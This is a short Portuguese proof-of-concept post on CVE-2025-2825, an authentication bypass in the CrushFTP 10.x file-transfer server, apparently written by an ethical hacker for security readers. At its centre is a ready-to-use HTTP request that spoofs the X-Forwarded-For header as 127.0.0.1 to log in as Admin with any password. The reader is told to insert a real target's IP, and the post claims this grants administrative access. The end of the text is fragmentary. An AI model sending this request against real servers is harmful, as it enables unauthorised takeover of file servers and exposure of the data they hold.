Bypass de Autenticação PoC para CVE-2025-2825 – Explorando CrushFTP 10.x
CVE-2025-2825 é uma vulnerabilidade crítica de desvio de autenticação que afeta o CrushFTP, um servidor de transferência segura de arquivos amplamente utilizado. A falha permite que invasores remotos contornem a autenticação de login e obtenham acesso administrativo através de spoofing de cabeçalhos — enganando o servidor para que pense que a requisição veio do localhost.
A vulnerabilidade surge devido à validação inadequada do cabeçalho X-Forwarded-For. Quando este cabeçalho é definido como 127.0.0.1, o servidor trata a requisição como local — contornando a autenticação.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Substitua
target-ippelo endereço IP real do servidor CrushFTP alvo.
Se bem-sucedida, o servidor ignora a autenticação e concede acesso — mesmo com credenciais incorretas.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Hacker Ético Certificado (CEH v13)
Graduado em Engenharia da Computação (B.Tech)
🔗 Perfil do LinkedIn
🔗 Perfil do GitHub